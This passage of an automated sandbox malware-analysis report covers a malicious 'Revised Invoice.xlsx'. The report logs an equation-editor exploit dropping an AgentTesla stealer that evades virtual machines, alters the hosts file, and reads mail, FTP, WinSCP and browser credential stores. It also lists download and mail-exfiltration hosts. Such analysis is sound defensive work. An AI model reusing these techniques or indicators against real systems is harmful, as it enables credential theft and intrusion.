                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ObliNMm2L89TSKT[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035704DE URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035704DE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\regasm_svchost.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops PE files to the user root directory
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\regasm_svchost.exeJump to dropped file
                  Source: C:\Users\Public\regasm_svchost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regasm_svchost.exe PID: 2364, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: regasm_svchost.exe, 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: regasm_svchost.exe, 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\Public\regasm_svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                  Source: C:\Users\Public\regasm_svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1444Thread sleep time: -360000s >= -30000sJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exe TID: 792Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exe TID: 2836Thread sleep time: -480000s >= -30000sJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exe TID: 1056Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exe TID: 1056Thread sleep time: -840000s >= -30000sJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exe TID: 3044Thread sleep count: 9253 > 30Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeWindow / User API: threadDelayed 9253Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\Public\regasm_svchost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\regasm_svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-659
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-697
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-679
                  Source: regasm_svchost.exe, 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                  Source: regasm_svchost.exe, 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: regasm_svchost.exe, 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: regasm_svchost.exe, 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: EQNEDT32.EXE, 00000002.00000002.979348239.0000000000350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                  Source: regasm_svchost.exe, 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                  Source: regasm_svchost.exe, 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: regasm_svchost.exe, 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: regasm_svchost.exe, 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: EQNEDT32.EXE, 00000002.00000002.971451192.0000000000330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Lb
                  Source: regasm_svchost.exe, 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                  Source: C:\Users\Public\regasm_svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570564 mov edx, dword ptr fs:[00000030h]2_2_03570564
                  Source: C:\Users\Public\regasm_svchost.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Modifies the hosts file
                  Source: C:\Users\Public\regasm_svchost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\Public\regasm_svchost.exeMemory written: C:\Users\Public\regasm_svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\regasm_svchost.exe "C:\Users\Public\regasm_svchost.exe" Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeProcess created: C:\Users\Public\regasm_svchost.exe {path}Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeQueries volume information: C:\Users\Public\regasm_svchost.exe VolumeInformationJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeQueries volume information: C:\Users\Public\regasm_svchost.exe VolumeInformationJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Modifies the hosts file
                  Source: C:\Users\Public\regasm_svchost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 6.2.regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.regasm_svchost.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.regasm_svchost.exe.3860770.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.regasm_svchost.exe.400000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.regasm_svchost.exe.3860770.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.regasm_svchost.exe.400000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.regasm_svchost.exe.400000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.regasm_svchost.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.regasm_svchost.exe.37acd20.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000000.988019664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000000.987598461.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1168247858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000000.988445692.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000000.988786427.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.995073960.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1170243625.000000000272A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regasm_svchost.exe PID: 2364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regasm_svchost.exe PID: 2540, type: MEMORYSTR
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\Public\regasm_svchost.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\Public\regasm_svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\Public\regasm_svchost.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\Public\regasm_svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\Public\regasm_svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: Yara matchFile source: 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regasm_svchost.exe PID: 2540, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 6.2.regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.regasm_svchost.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.regasm_svchost.exe.3860770.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.regasm_svchost.exe.400000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.regasm_svchost.exe.3860770.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.regasm_svchost.exe.400000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.regasm_svchost.exe.400000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.regasm_svchost.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.regasm_svchost.exe.37acd20.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000000.988019664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000000.987598461.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1168247858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000000.988445692.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000000.988786427.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.995073960.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1170243625.000000000272A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regasm_svchost.exe PID: 2364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regasm_svchost.exe PID: 2540, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts211
                  Windows Management Instrumentation                  		Path Interception111
                  Process Injection                  		1
                  File and Directory Permissions Modification                  		2
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		Exfiltration Over Other Network Medium33
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts1
                  Scripting                  		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                  Disable or Modify Tools                  		1
                  Credentials in Registry                  		114
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		Exfiltration Over Bluetooth1
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts23
                  Exploitation for Client Execution                  		Logon Script (Windows)Logon Script (Windows)1
                  Deobfuscate/Decode Files or Information                  		Security Account Manager1
                  Query Registry                  		SMB/Windows Admin Shares1
                  Email Collection                  		Automated Exfiltration1
                  Non-Standard Port                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Scripting                  		NTDS311
                  Security Software Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Non-Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information                  		LSA Secrets1
                  Process Discovery                  		SSHKeyloggingData Transfer Size Limits32
                  Application Layer Protocol                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common3
                  Software Packing                  		Cached Domain Credentials131
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job131
                  Virtualization/Sandbox Evasion                  		Proc Filesystem1
                  Remote System Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)111
                  Process Injection                  		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 673697 Sample: Revised Invoice.xlsx Startdate: 26/07/2022 Architecture: WINDOWS Score: 100 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus detection for URL or domain 2->40 42 Multi AV Scanner detection for dropped file 2->42 44 13 other signatures 2->44 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 34 37 2->12         started        process3 dnsIp4 36 107.174.138.192, 49173, 80 AS-COLOCROSSINGUS United States 7->36 24 C:\Users\user\...\ObliNMm2L89TSKT[1].exe, PE32 7->24 dropped 26 C:\Users\Public\regasm_svchost.exe, PE32 7->26 dropped 54 Office equation editor establishes network connection 7->54 56 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->56 14 regasm_svchost.exe 7->14         started        28 C:\Users\user\...\~$Revised Invoice.xlsx, data 12->28 dropped file5 signatures6 process7 signatures8 58 Multi AV Scanner detection for dropped file 14->58 60 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->60 62 Machine Learning detection for dropped file 14->62 64 2 other signatures 14->64 17 regasm_svchost.exe 4 14->17         started        process9 dnsIp10 30 bluemix.cl 104.149.221.234, 49174, 587 TIER-NETUS United States 17->30 32 mail.bluemix.cl 17->32 34 2 other 